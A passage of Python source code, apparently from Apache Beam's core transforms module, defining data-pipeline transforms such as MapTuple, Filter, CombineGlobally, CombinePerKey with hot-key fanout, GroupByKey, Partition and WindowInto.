r""":func:`MapTuple` is like :func:`Map` but expects tuple inputs and
flattens them into multiple input arguments.
beam.MapTuple(lambda a, b, ...: ...)
is equivalent to Python 2
beam.Map(lambda (a, b, ...), ...: ...)
In other words
beam.MapTuple(fn)
is equivalent to
beam.Map(lambda element, ...: fn(\*element, ...))
This can be useful when processing a PCollection of tuples
(e.g. key-value pairs).
Args:
fn (callable): a callable object.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`MapTuple` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
if not callable(fn):
raise TypeError(
'MapTuple can be used only with callable objects. '
'Received %r instead.' % (fn))
label = 'MapTuple(%s)' % ptransform.label_from_callable(fn)
arg_names, defaults = get_function_args_defaults(fn)
num_defaults = len(defaults)
if num_defaults < len(args) + len(kwargs):
raise TypeError('Side inputs must have defaults for MapTuple.')
if defaults or args or kwargs:
wrapper = lambda x, *args, **kwargs: [fn(*(tuple(x) + args), **kwargs)]
else:
wrapper = lambda x: [fn(*x)]
# Proxy the type-hint information from the original function to this new
# wrapped function.
type_hints = get_type_hints(fn)
if type_hints.input_types is not None:
wrapper = with_input_types(
*type_hints.input_types[0], **type_hints.input_types[1])(
wrapper)
output_hint = type_hints.simple_output_type(label)
if output_hint:
wrapper = with_output_types(typehints.Iterable[output_hint])(wrapper)
# Replace the first (args) component.
modified_arg_names = ['tuple_element'] + arg_names[-num_defaults:]
modified_argspec = (modified_arg_names, defaults)
pardo = ParDo(
CallableWrapperDoFn(wrapper, fullargspec=modified_argspec),
*args,
**kwargs)
pardo.label = label
return pardo
def FlatMapTuple(fn, *args, **kwargs): # pylint: disable=invalid-name
r""":func:`FlatMapTuple` is like :func:`FlatMap` but expects tuple inputs and
flattens them into multiple input arguments.
beam.FlatMapTuple(lambda a, b, ...: ...)
is equivalent to Python 2
beam.FlatMap(lambda (a, b, ...), ...: ...)
In other words
beam.FlatMapTuple(fn)
is equivalent to
beam.FlatMap(lambda element, ...: fn(\*element, ...))
This can be useful when processing a PCollection of tuples
(e.g. key-value pairs).
Args:
fn (callable): a callable object.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`FlatMapTuple` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
if not callable(fn):
raise TypeError(
'FlatMapTuple can be used only with callable objects. '
'Received %r instead.' % (fn))
label = 'FlatMapTuple(%s)' % ptransform.label_from_callable(fn)
arg_names, defaults = get_function_args_defaults(fn)
num_defaults = len(defaults)
if num_defaults < len(args) + len(kwargs):
raise TypeError('Side inputs must have defaults for FlatMapTuple.')
if defaults or args or kwargs:
wrapper = lambda x, *args, **kwargs: fn(*(tuple(x) + args), **kwargs)
else:
wrapper = lambda x: fn(*x)
# Proxy the type-hint information from the original function to this new
# wrapped function.
type_hints = get_type_hints(fn)
if type_hints.input_types is not None:
wrapper = with_input_types(
*type_hints.input_types[0], **type_hints.input_types[1])(
wrapper)
output_hint = type_hints.simple_output_type(label)
if output_hint:
wrapper = with_output_types(output_hint)(wrapper)
# Replace the first (args) component.
modified_arg_names = ['tuple_element'] + arg_names[-num_defaults:]
modified_argspec = (modified_arg_names, defaults)
pardo = ParDo(
CallableWrapperDoFn(wrapper, fullargspec=modified_argspec),
*args,
**kwargs)
pardo.label = label
return pardo
def Filter(fn, *args, **kwargs): # pylint: disable=invalid-name
""":func:`Filter` is a :func:`FlatMap` with its callable filtering out
elements.
Args:
fn (``Callable[..., bool]``): a callable object. First argument will be an
element.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`Filter` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
if not callable(fn):
raise TypeError(
'Filter can be used only with callable objects. '
'Received %r instead.' % (fn))
wrapper = lambda x, *args, **kwargs: [x] if fn(x, *args, **kwargs) else []
label = 'Filter(%s)' % ptransform.label_from_callable(fn)
# TODO: What about callable classes?
if hasattr(fn, '__name__'):
wrapper.__name__ = fn.__name__
# Get type hints from this instance or the callable. Do not use output type
# hints from the callable (which should be bool if set).
fn_type_hints = typehints.decorators.IOTypeHints.from_callable(fn)
if fn_type_hints is not None:
fn_type_hints = fn_type_hints.with_output_types()
type_hints = get_type_hints(fn).with_defaults(fn_type_hints)
# Proxy the type-hint information from the function being wrapped, setting the
# output type to be the same as the input type.
if type_hints.input_types is not None:
wrapper = with_input_types(
*type_hints.input_types[0], **type_hints.input_types[1])(
wrapper)
output_hint = type_hints.simple_output_type(label)
if (output_hint is None and get_type_hints(wrapper).input_types and
get_type_hints(wrapper).input_types[0]):
output_hint = get_type_hints(wrapper).input_types[0][0]
if output_hint:
wrapper = with_output_types(typehints.Iterable[output_hint])(wrapper)
# pylint: disable=protected-access
wrapper._argspec_fn = fn
# pylint: enable=protected-access
pardo = FlatMap(wrapper, *args, **kwargs)
pardo.label = label
return pardo
def _combine_payload(combine_fn, context):
return beam_runner_api_pb2.CombinePayload(
combine_fn=combine_fn.to_runner_api(context),
accumulator_coder_id=context.coders.get_id(
combine_fn.get_accumulator_coder()))
class CombineGlobally(PTransform):
"""A :class:`CombineGlobally` transform.
Reduces a :class:`~apache_beam.pvalue.PCollection` to a single value by
progressively applying a :class:`CombineFn` to portions of the
:class:`~apache_beam.pvalue.PCollection` (and to intermediate values created
thereby). See documentation in :class:`CombineFn` for details on the specifics
on how :class:`CombineFn` s are applied.
Args:
pcoll (~apache_beam.pvalue.PCollection):
a :class:`~apache_beam.pvalue.PCollection` to be reduced into a single
value.
fn (callable): a :class:`CombineFn` object that will be called to
progressively reduce the :class:`~apache_beam.pvalue.PCollection` into
single values, or a callable suitable for wrapping by
:class:`~apache_beam.transforms.core.CallableWrapperCombineFn`.
*args: positional arguments passed to the :class:`CombineFn` object.
**kwargs: keyword arguments passed to the :class:`CombineFn` object.
Raises:
TypeError: If the output type of the input
:class:`~apache_beam.pvalue.PCollection` is not compatible
with ``Iterable[A]``.
Returns:
~apache_beam.pvalue.PCollection: A single-element
:class:`~apache_beam.pvalue.PCollection` containing the main output of
the :class:`CombineGlobally` transform.
Note that the positional and keyword arguments will be processed in order
to detect :class:`~apache_beam.pvalue.PValue` s that will be computed as side
inputs to the transform.
During pipeline execution whenever the :class:`CombineFn` object gets executed
(i.e. any of the :class:`CombineFn` methods get called), the
:class:`~apache_beam.pvalue.PValue` arguments will be replaced by their
actual value in the exact position where they appear in the argument lists.
"""
has_defaults = True
as_view = False
fanout = None
def __init__(self, fn, *args, **kwargs):
if not (isinstance(fn, CombineFn) or callable(fn)):
raise TypeError(
'CombineGlobally can be used only with combineFn objects. '
'Received %r instead.' % (fn))
super(CombineGlobally, self).__init__()
self.fn = fn
self.args = args
self.kwargs = kwargs
def display_data(self):
return {
'combine_fn': DisplayDataItem(
self.fn.__class__, label='Combine Function'),
'combine_fn_dd': self.fn,
}
def default_label(self):
if self.fanout is None:
return '%s(%s)' % (
self.__class__.__name__, ptransform.label_from_callable(self.fn))
else:
return '%s(%s, fanout=%s)' % (
self.__class__.__name__,
ptransform.label_from_callable(self.fn),
self.fanout)
def _clone(self, **extra_attributes):
clone = copy.copy(self)
clone.__dict__.update(extra_attributes)
return clone
def with_fanout(self, fanout):
return self._clone(fanout=fanout)
def with_defaults(self, has_defaults=True):
return self._clone(has_defaults=has_defaults)
def without_defaults(self):
return self.with_defaults(False)
def as_singleton_view(self):
return self._clone(as_view=True)
def expand(self, pcoll):
def add_input_types(transform):
type_hints = self.get_type_hints()
if type_hints.input_types:
return transform.with_input_types(type_hints.input_types[0][0])
return transform
combine_per_key = CombinePerKey(self.fn, *self.args, **self.kwargs)
if self.fanout:
combine_per_key = combine_per_key.with_hot_key_fanout(self.fanout)
combined = (
pcoll
| 'KeyWithVoid' >> add_input_types(
Map(lambda v: (None, v)).with_output_types(
typehints.KV[None, pcoll.element_type]))
| 'CombinePerKey' >> combine_per_key
| 'UnKey' >> Map(lambda k_v: k_v[1]))
if not self.has_defaults and not self.as_view:
return combined
if self.has_defaults:
combine_fn = (
self.fn if isinstance(self.fn, CombineFn) else
CombineFn.from_callable(self.fn))
default_value = combine_fn.apply([], *self.args, **self.kwargs)
else:
default_value = pvalue.AsSingleton._NO_DEFAULT # pylint: disable=protected-access
view = pvalue.AsSingleton(combined, default_value=default_value)
if self.as_view:
return view
else:
if pcoll.windowing.windowfn != GlobalWindows():
raise ValueError(
"Default values are not yet supported in CombineGlobally() if the "
"output PCollection is not windowed by GlobalWindows. "
"Instead, use CombineGlobally().without_defaults() to output "
"an empty PCollection if the input PCollection is empty, "
"or CombineGlobally().as_singleton_view() to get the default "
"output of the CombineFn if the input PCollection is empty.")
def typed(transform):
# TODO(robertwb): We should infer this.
if combined.element_type:
return transform.with_output_types(combined.element_type)
return transform
return (
pcoll.pipeline
| 'DoOnce' >> Create([None])
| 'InjectDefault' >> typed(Map(lambda _, s: s, view)))
class CombinePerKey(PTransformWithSideInputs):
"""A per-key Combine transform.
Identifies sets of values associated with the same key in the input
PCollection, then applies a CombineFn to condense those sets to single
values. See documentation in CombineFn for details on the specifics on how
CombineFns are applied.
Args:
pcoll: input pcollection.
fn: instance of CombineFn to apply to all values under the same key in
pcoll, or a callable whose signature is ``f(iterable, *args, **kwargs)``
(e.g., sum, max).
*args: arguments and side inputs, passed directly to the CombineFn.
**kwargs: arguments and side inputs, passed directly to the CombineFn.
Returns:
A PObject holding the result of the combine operation.
"""
def with_hot_key_fanout(self, fanout):
"""A per-key combine operation like self but with two levels of aggregation.
If a given key is produced by too many upstream bundles, the final
reduction can become a bottleneck despite partial combining being lifted
pre-GroupByKey. In these cases it can be helpful to perform intermediate
partial aggregations in parallel and then re-group to peform a final
(per-key) combine. This is also useful for high-volume keys in streaming
where combiners are not generally lifted for latency reasons.
Note that a fanout greater than 1 requires the data to be sent through
two GroupByKeys, and a high fanout can also result in more shuffle data
due to less per-bundle combining. Setting the fanout for a key at 1 or less
places values on the "cold key" path that skip the intermediate level of
aggregation.
Args:
fanout: either None, for no fanout, an int, for a constant-degree fanout,
or a callable mapping keys to a key-specific degree of fanout.
Returns:
A per-key combining PTransform with the specified fanout.
"""
from apache_beam.transforms.combiners import curry_combine_fn
if fanout is None:
return self
else:
return _CombinePerKeyWithHotKeyFanout(
curry_combine_fn(self.fn, self.args, self.kwargs), fanout)
def display_data(self):
return {
'combine_fn': DisplayDataItem(
self.fn.__class__, label='Combine Function'),
'combine_fn_dd': self.fn
}
def make_fn(self, fn, has_side_inputs):
self._fn_label = ptransform.label_from_callable(fn)
return CombineFn.maybe_from_callable(fn, has_side_inputs)
def default_label(self):
return '%s(%s)' % (self.__class__.__name__, self._fn_label)
def _process_argspec_fn(self):
return lambda element, *args, **kwargs: None
def expand(self, pcoll):
args, kwargs = util.insert_values_in_args(
self.args, self.kwargs, self.side_inputs)
return pcoll | GroupByKey() | 'Combine' >> CombineValues(
self.fn, *args, **kwargs)
def default_type_hints(self):
hints = self.fn.get_type_hints()
if hints.input_types:
K = typehints.TypeVariable('K')
args, kwargs = hints.input_types
args = (typehints.Tuple[K, args[0]], ) + args[1:]
hints = hints.with_input_types(*args, **kwargs)
else:
K = typehints.Any
if hints.output_types:
main_output_type = hints.simple_output_type('')
hints = hints.with_output_types(typehints.Tuple[K, main_output_type])
return hints
def to_runner_api_parameter(
self,
context # type: PipelineContext
):
# type: (...) -> typing.Tuple[str, beam_runner_api_pb2.CombinePayload]
if self.args or self.kwargs:
from apache_beam.transforms.combiners import curry_combine_fn
combine_fn = curry_combine_fn(self.fn, self.args, self.kwargs)
else:
combine_fn = self.fn
return (
common_urns.composites.COMBINE_PER_KEY.urn,
_combine_payload(combine_fn, context))
@staticmethod
@PTransform.register_urn(
common_urns.composites.COMBINE_PER_KEY.urn,
beam_runner_api_pb2.CombinePayload)
def from_runner_api_parameter(combine_payload, context):
return CombinePerKey(
CombineFn.from_runner_api(combine_payload.combine_fn, context))
def runner_api_requires_keyed_input(self):
return True
# TODO(robertwb): Rename to CombineGroupedValues?
class CombineValues(PTransformWithSideInputs):
def make_fn(self, fn, has_side_inputs):
return CombineFn.maybe_from_callable(fn, has_side_inputs)
def expand(self, pcoll):
args, kwargs = util.insert_values_in_args(
self.args, self.kwargs, self.side_inputs)
input_type = pcoll.element_type
key_type = None
if input_type is not None:
key_type, _ = input_type.tuple_types
runtime_type_check = (
pcoll.pipeline._options.view_as(TypeOptions).runtime_type_check)
return pcoll | ParDo(
CombineValuesDoFn(key_type, self.fn, runtime_type_check),
*args,
**kwargs)
def to_runner_api_parameter(self, context):
if self.args or self.kwargs:
from apache_beam.transforms.combiners import curry_combine_fn
combine_fn = curry_combine_fn(self.fn, self.args, self.kwargs)
else:
combine_fn = self.fn
return (
common_urns.combine_components.COMBINE_GROUPED_VALUES.urn,
_combine_payload(combine_fn, context))
@staticmethod
@PTransform.register_urn(
common_urns.combine_components.COMBINE_GROUPED_VALUES.urn,
beam_runner_api_pb2.CombinePayload)
def from_runner_api_parameter(combine_payload, context):
return CombineValues(
CombineFn.from_runner_api(combine_payload.combine_fn, context))
class CombineValuesDoFn(DoFn):
"""DoFn for performing per-key Combine transforms."""
def __init__(self,
input_pcoll_type,
combinefn, # type: CombineFn
runtime_type_check, # type: bool
):
super(CombineValuesDoFn, self).__init__()
self.combinefn = combinefn
self.runtime_type_check = runtime_type_check
def process(self, element, *args, **kwargs):
# Expected elements input to this DoFn are 2-tuples of the form
# (key, iter), with iter an iterable of all the values associated with key
# in the input PCollection.
if self.runtime_type_check:
# Apply the combiner in a single operation rather than artificially
# breaking it up so that output type violations manifest as TypeCheck
# errors rather than type errors.
return [(element[0], self.combinefn.apply(element[1], *args, **kwargs))]
# Add the elements into three accumulators (for testing of merge).
elements = list(element[1])
accumulators = []
for k in range(3):
if len(elements) <= k:
break
accumulators.append(
self.combinefn.add_inputs(
self.combinefn.create_accumulator(*args, **kwargs),
elements[k::3],
*args,
**kwargs))
# Merge the accumulators.
accumulator = self.combinefn.merge_accumulators(
accumulators, *args, **kwargs)
# Convert accumulator to the final result.
return [(
element[0], self.combinefn.extract_output(accumulator, *args,
**kwargs))]
def default_type_hints(self):
hints = self.combinefn.get_type_hints()
if hints.input_types:
K = typehints.TypeVariable('K')
args, kwargs = hints.input_types
args = (typehints.Tuple[K, typehints.Iterable[args[0]]], ) + args[1:]
hints = hints.with_input_types(*args, **kwargs)
else:
K = typehints.Any
if hints.output_types:
main_output_type = hints.simple_output_type('')
hints = hints.with_output_types(typehints.Tuple[K, main_output_type])
return hints
class _CombinePerKeyWithHotKeyFanout(PTransform):
def __init__(self,
combine_fn, # type: CombineFn
fanout, # type: typing.Union[int, typing.Callable[[typing.Any], int]]
):
# type: (...) -> None
self._combine_fn = combine_fn
self._fanout_fn = ((lambda key: fanout)
if isinstance(fanout, int) else fanout)
def default_label(self):
return '%s(%s, fanout=%s)' % (
self.__class__.__name__,
ptransform.label_from_callable(self._combine_fn),
ptransform.label_from_callable(self._fanout_fn))
def expand(self, pcoll):
from apache_beam.transforms.trigger import AccumulationMode
combine_fn = self._combine_fn
fanout_fn = self._fanout_fn
class SplitHotCold(DoFn):
def start_bundle(self):
# Spreading a hot key across all possible sub-keys for all bundles
# would defeat the goal of not overwhelming downstream reducers
# (as well as making less efficient use of PGBK combining tables).
# Instead, each bundle independently makes a consistent choice about
# which "shard" of a key to send its intermediate results.
self._nonce = int(random.getrandbits(31))
def process(self, element):
key, value = element
fanout = fanout_fn(key)
if fanout <= 1:
# Boolean indicates this is not an accumulator.
yield (key, (False, value)) # cold
else:
yield pvalue.TaggedOutput('hot', ((self._nonce % fanout, key), value))
class PreCombineFn(CombineFn):
@staticmethod
def extract_output(accumulator):
# Boolean indicates this is an accumulator.
return (True, accumulator)
create_accumulator = combine_fn.create_accumulator
add_input = combine_fn.add_input
merge_accumulators = combine_fn.merge_accumulators
compact = combine_fn.compact
class PostCombineFn(CombineFn):
@staticmethod
def add_input(accumulator, element):
is_accumulator, value = element
if is_accumulator:
return combine_fn.merge_accumulators([accumulator, value])
else:
return combine_fn.add_input(accumulator, value)
create_accumulator = combine_fn.create_accumulator
merge_accumulators = combine_fn.merge_accumulators
compact = combine_fn.compact
extract_output = combine_fn.extract_output
def StripNonce(nonce_key_value):
(_, key), value = nonce_key_value
return key, value
cold, hot = pcoll | ParDo(SplitHotCold()).with_outputs('hot', main='cold')
cold.element_type = typehints.Any # No multi-output type hints.
precombined_hot = (
hot
# Avoid double counting that may happen with stacked accumulating mode.
| 'WindowIntoDiscarding' >> WindowInto(
pcoll.windowing, accumulation_mode=AccumulationMode.DISCARDING)
| CombinePerKey(PreCombineFn())
| Map(StripNonce)
| 'WindowIntoOriginal' >> WindowInto(pcoll.windowing))
return ((cold, precombined_hot)
| Flatten()
| CombinePerKey(PostCombineFn()))
@typehints.with_input_types(typing.Tuple[K, V])
@typehints.with_output_types(typing.Tuple[K, typing.Iterable[V]])
class GroupByKey(PTransform):
"""A group by key transform.
Processes an input PCollection consisting of key/value pairs represented as a
tuple pair. The result is a PCollection where values having a common key are
grouped together. For example (a, 1), (b, 2), (a, 3) will result into
(a, [1, 3]), (b, [2]).
The implementation here is used only when run on the local direct runner.
"""
class ReifyWindows(DoFn):
def process(
self, element, window=DoFn.WindowParam, timestamp=DoFn.TimestampParam):
try:
k, v = element
except TypeError:
raise TypeCheckError(
'Input to GroupByKey must be a PCollection with '
'elements compatible with KV[A, B]')
return [(k, WindowedValue(v, timestamp, [window]))]
def infer_output_type(self, input_type):
key_type, value_type = trivial_inference.key_value_types(input_type)
return typehints.Iterable[typehints.KV[
key_type, typehints.WindowedValue[value_type]]] # type: ignore[misc]
def expand(self, pcoll):
# This code path is only used in the local direct runner. For Dataflow
# runner execution, the GroupByKey transform is expanded on the service.
input_type = pcoll.element_type
if input_type is not None:
# Initialize type-hints used below to enforce type-checking and to pass
# downstream to further PTransforms.
key_type, value_type = trivial_inference.key_value_types(input_type)
# Enforce the input to a GBK has a KV element type.
pcoll.element_type = typehints.KV[key_type, value_type]
typecoders.registry.verify_deterministic(
typecoders.registry.get_coder(key_type),
'GroupByKey operation "%s"' % self.label)
reify_output_type = typehints.KV[
key_type, typehints.WindowedValue[value_type]] # type: ignore[misc]
gbk_input_type = (
typehints.KV[key_type,
typehints.Iterable[typehints.WindowedValue[value_type]]]
) # type: ignore[misc]
gbk_output_type = typehints.KV[key_type, typehints.Iterable[value_type]]
# pylint: disable=bad-continuation
return (
pcoll
| 'ReifyWindows' >>
(ParDo(self.ReifyWindows()).with_output_types(reify_output_type))
| 'GroupByKey' >> (
_GroupByKeyOnly().with_input_types(
reify_output_type).with_output_types(gbk_input_type))
| (
'GroupByWindow' >>
_GroupAlsoByWindow(pcoll.windowing).with_input_types(
gbk_input_type).with_output_types(gbk_output_type)))
else:
# The input_type is None, run the default
return (
pcoll
| 'ReifyWindows' >> ParDo(self.ReifyWindows())
| 'GroupByKey' >> _GroupByKeyOnly()
| 'GroupByWindow' >> _GroupAlsoByWindow(pcoll.windowing))
def infer_output_type(self, input_type):
key_type, value_type = trivial_inference.key_value_types(input_type)
return typehints.KV[key_type, typehints.Iterable[value_type]]
def to_runner_api_parameter(self, unused_context):
# type: (PipelineContext) -> typing.Tuple[str, None]
return common_urns.primitives.GROUP_BY_KEY.urn, None
@staticmethod
@PTransform.register_urn(common_urns.primitives.GROUP_BY_KEY.urn, None)
def from_runner_api_parameter(unused_payload, unused_context):
return GroupByKey()
def runner_api_requires_keyed_input(self):
return True
@typehints.with_input_types(typing.Tuple[K, V])
@typehints.with_output_types(typing.Tuple[K, typing.Iterable[V]])
class _GroupByKeyOnly(PTransform):
"""A group by key transform, ignoring windows."""
def infer_output_type(self, input_type):
key_type, value_type = trivial_inference.key_value_types(input_type)
return typehints.KV[key_type, typehints.Iterable[value_type]]
def expand(self, pcoll):
self._check_pcollection(pcoll)
return pvalue.PCollection.from_(pcoll)
@typehints.with_input_types(typing.Tuple[K, typing.Iterable[V]])
@typehints.with_output_types(typing.Tuple[K, typing.Iterable[V]])
class _GroupAlsoByWindow(ParDo):
"""The GroupAlsoByWindow transform."""
def __init__(self, windowing):
super(_GroupAlsoByWindow, self).__init__(_GroupAlsoByWindowDoFn(windowing))
self.windowing = windowing
def expand(self, pcoll):
self._check_pcollection(pcoll)
return pvalue.PCollection.from_(pcoll)
class _GroupAlsoByWindowDoFn(DoFn):
# TODO(robertwb): Support combiner lifting.
def __init__(self, windowing):
super(_GroupAlsoByWindowDoFn, self).__init__()
self.windowing = windowing
def infer_output_type(self, input_type):
key_type, windowed_value_iter_type = trivial_inference.key_value_types(
input_type)
value_type = windowed_value_iter_type.inner_type.inner_type
return typehints.Iterable[typehints.KV[key_type,
typehints.Iterable[value_type]]]
def start_bundle(self):
# pylint: disable=wrong-import-order, wrong-import-position
from apache_beam.transforms.trigger import create_trigger_driver
# pylint: enable=wrong-import-order, wrong-import-position
self.driver = create_trigger_driver(self.windowing, True)
def process(self, element):
k, vs = element
return self.driver.process_entire_key(k, vs)
class Partition(PTransformWithSideInputs):
"""Split a PCollection into several partitions.
Uses the specified PartitionFn to separate an input PCollection into the
specified number of sub-PCollections.
When apply()d, a Partition() PTransform requires the following:
Args:
partitionfn: a PartitionFn, or a callable with the signature described in
CallableWrapperPartitionFn.
n: number of output partitions.
The result of this PTransform is a simple list of the output PCollections
representing each of n partitions, in order.
"""
class ApplyPartitionFnFn(DoFn):
"""A DoFn that applies a PartitionFn."""
def process(self, element, partitionfn, n, *args, **kwargs):
partition = partitionfn.partition_for(element, n, *args, **kwargs)
if not 0 <= partition < n:
raise ValueError(
'PartitionFn specified out-of-bounds partition index: '
'%d not in [0, %d)' % (partition, n))
# Each input is directed into the output that corresponds to the
# selected partition.
yield pvalue.TaggedOutput(str(partition), element)
def make_fn(self, fn, has_side_inputs):
return fn if isinstance(fn, PartitionFn) else CallableWrapperPartitionFn(fn)
def expand(self, pcoll):
n = int(self.args[0])
return pcoll | ParDo(
self.ApplyPartitionFnFn(), self.fn, *self.args, **
self.kwargs).with_outputs(*[str(t) for t in range(n)])
class Windowing(object):
def __init__(self,
windowfn, # type: WindowFn
triggerfn=None, # type: typing.Optional[TriggerFn]
accumulation_mode=None, # type: typing.Optional[beam_runner_api_pb2.AccumulationMode]
timestamp_combiner=None, # type: typing.Optional[beam_runner_api_pb2.OutputTime]
allowed_lateness=0, # type: typing.Union[int, float]
):
"""Class representing the window strategy.
Args:
windowfn: Window assign function.
triggerfn: Trigger function.
accumulation_mode: a AccumulationMode, controls what to do with data
when a trigger fires multiple times.
timestamp_combiner: a TimestampCombiner, determines how output
timestamps of grouping operations are assigned.
allowed_lateness: Maximum delay in seconds after end of window
allowed for any late data to be processed without being discarded
directly.
"""
global AccumulationMode, DefaultTrigger # pylint: disable=global-variable-not-assigned
# pylint: disable=wrong-import-order, wrong-import-position
from apache_beam.transforms.trigger import AccumulationMode, DefaultTrigger
# pylint: enable=wrong-import-order, wrong-import-position
if triggerfn is None:
triggerfn = DefaultTrigger()
if accumulation_mode is None:
if triggerfn == DefaultTrigger():
accumulation_mode = AccumulationMode.DISCARDING
else:
raise ValueError(
'accumulation_mode must be provided for non-trivial triggers')
if not windowfn.get_window_coder().is_deterministic():
raise ValueError(
'window fn (%s) does not have a determanistic coder (%s)' %
(windowfn, windowfn.get_window_coder()))
self.windowfn = windowfn
self.triggerfn = triggerfn
self.accumulation_mode = accumulation_mode
self.allowed_lateness = Duration.of(allowed_lateness)
self.timestamp_combiner = (
timestamp_combiner or TimestampCombiner.OUTPUT_AT_EOW)
self._is_default = (
self.windowfn == GlobalWindows() and
self.triggerfn == DefaultTrigger() and
self.accumulation_mode == AccumulationMode.DISCARDING and
self.timestamp_combiner == TimestampCombiner.OUTPUT_AT_EOW and
self.allowed_lateness == 0)
def __repr__(self):
return "Windowing(%s, %s, %s, %s)" % (
self.windowfn,
self.triggerfn,
self.accumulation_mode,
self.timestamp_combiner)
def __eq__(self, other):
if type(self) == type(other):
if self._is_default and other._is_default:
return True
return (
self.windowfn == other.windowfn and
self.triggerfn == other.triggerfn and
self.accumulation_mode == other.accumulation_mode and
self.timestamp_combiner == other.timestamp_combiner and
self.allowed_lateness == other.allowed_lateness)
return False
def __ne__(self, other):
# TODO(BEAM-5949): Needed for Python 2 compatibility.
return not self == other
def __hash__(self):
return hash((
self.windowfn,
self.triggerfn,
self.accumulation_mode,
self.allowed_lateness,
self.timestamp_combiner))
def is_default(self):
return self._is_default
def to_runner_api(self, context):
# type: (PipelineContext) -> beam_runner_api_pb2.WindowingStrategy
return beam_runner_api_pb2.WindowingStrategy(
window_fn=self.windowfn.to_runner_api(context),
# TODO(robertwb): Prohibit implicit multi-level merging.
merge_status=(
beam_runner_api_pb2.MergeStatus.NEEDS_MERGE
if self.windowfn.is_merging() else
beam_runner_api_pb2.MergeStatus.NON_MERGING),
window_coder_id=context.coders.get_id(self.windowfn.get_window_coder()),
trigger=self.triggerfn.to_runner_api(context),
accumulation_mode=self.accumulation_mode,
output_time=self.timestamp_combiner,
# TODO(robertwb): Support EMIT_IF_NONEMPTY
closing_behavior=beam_runner_api_pb2.ClosingBehavior.EMIT_ALWAYS,
OnTimeBehavior=beam_runner_api_pb2.OnTimeBehavior.FIRE_ALWAYS,
allowed_lateness=self.allowed_lateness.micros // 1000,
environment_id=context.default_environment_id())
@staticmethod
def from_runner_api(proto, context):
# pylint: disable=wrong-import-order, wrong-import-position
from apache_beam.transforms.trigger import TriggerFn
return Windowing(
windowfn=WindowFn.from_runner_api(proto.window_fn, context),
triggerfn=TriggerFn.from_runner_api(proto.trigger, context),
accumulation_mode=proto.accumulation_mode,
timestamp_combiner=proto.output_time,
allowed_lateness=Duration(micros=proto.allowed_lateness * 1000))
@typehints.with_input_types(T)
@typehints.with_output_types(T)
class WindowInto(ParDo):
"""A window transform assigning windows to each element of a PCollection.
Transforms an input PCollection by applying a windowing function to each
element. Each transformed element in the result will be a WindowedValue
element with the same input value and timestamp, with its new set of windows
determined by the windowing function.
"""
class WindowIntoFn(DoFn):
"""A DoFn that applies a WindowInto operation."""
def __init__(self, windowing):
# type: (Windowing) -> None
self.windowing = windowing
def process(
self, element, timestamp=DoFn.TimestampParam, window=DoFn.WindowParam):
context = WindowFn.AssignContext(
timestamp, element=element, window=window)
new_windows = self.windowing.windowfn.assign(context)
yield WindowedValue(element, context.timestamp, new_windows)
def __init__(self,
windowfn, # type: typing.Union[Windowing, WindowFn]
trigger=None, # type: typing.Optional[TriggerFn]
accumulation_mode=None,
timestamp_combiner=None,
allowed_lateness=0):
"""Initializes a WindowInto transform.
Args:
windowfn (Windowing, WindowFn): Function to be used for windowing.
trigger: (optional) Trigger used for windowing, or None for default.
accumulation_mode: (optional) Accumulation mode used for windowing,
required for non-trivial triggers.
timestamp_combiner: (optional) Timestamp combniner used for windowing,
or None for default.
"""
if isinstance(windowfn, Windowing):
# Overlay windowing with kwargs.
windowing = windowfn
windowfn = windowing.windowfn
# Use windowing to fill in defaults for the extra arguments.
trigger = trigger or windowing.triggerfn
accumulation_mode = accumulation_mode or windowing.accumulation_mode
timestamp_combiner = timestamp_combiner or windowing.timestamp_combiner
self.windowing = Windowing(
windowfn,
trigger,
accumulation_mode,
timestamp_combiner,
allowed_lateness)
super(WindowInto, self).__init__(self.WindowIntoFn(self.windowing))
def get_windowing(self, unused_inputs):
# type: (typing.Any) -> Windowing
return self.windowing
def infer_output_type(self, input_type):
return input_type
def expand(self, pcoll):
input_type = pcoll.element_type
if input_type is not None:
output_type = input_type
self.with_input_types(input_type)
self.with_output_types(output_type)
return super(WindowInto, self).expand(pcoll)
def to_runner_api_parameter(self, context):
# type: (PipelineContext) -> typing.Tuple[str, message.Message]
return (
common_urns.primitives.ASSIGN_WINDOWS.urn,
self.windowing.to_runner_api(context))
@staticmethod
def from_runner_api_parameter(proto, context):
windowing = Windowing.from_runner_api(proto, context)
return WindowInto(
windowing.windowfn,
trigger=windowing.triggerfn,
accumulation_mode=windowing.accumulation_mode,
timestamp_combiner=windowing.timestamp_combiner)
PTransform.register_urn(
common_urns.primitives.ASSIGN_WINDOWS.urn,
# TODO(robertwb): Update WindowIntoPayload to include the full strategy.
# (Right now only WindowFn is used, but we need this to reconstitute the
# WindowInto transform, and in the future will need it at runtime to
# support meta-data driven triggers.)
# TODO(robertwb): Use a reference rather than embedding?
beam_runner_api_pb2.WindowingStrategy,
WindowInto.from_runner_api_parameter)
# Python's pickling is broken for nested classes.
WindowIntoFn = WindowInto.WindowIntoFn
class Flatten(PTransform):
"""Merges several PCollections into a single PCollection.
Copies all elements in 0 or more PCollections into a single output
PCollection. If there are no input PCollections, the resulting PCollection
will be empty (but see also kwargs below).
Args:
**kwargs: Accepts a single named argument "pipeline", which specifies the
pipeline that "owns" this PTransform. Ordinarily Flatten can obtain this
information from one of the input PCollections, but if there are none (or
if there's a chance there may be none), this argument is the only way to
provide pipeline information and should be considered mandatory.
"""
def __init__(self, **kwargs):
super(Flatten, self).__init__()
self.pipeline = kwargs.pop(
'pipeline', None) # type: typing.Optional[Pipeline]
if kwargs:
raise ValueError('Unexpected keyword arguments: %s' % list(kwargs))
def _extract_input_pvalues(self, pvalueish):
try:
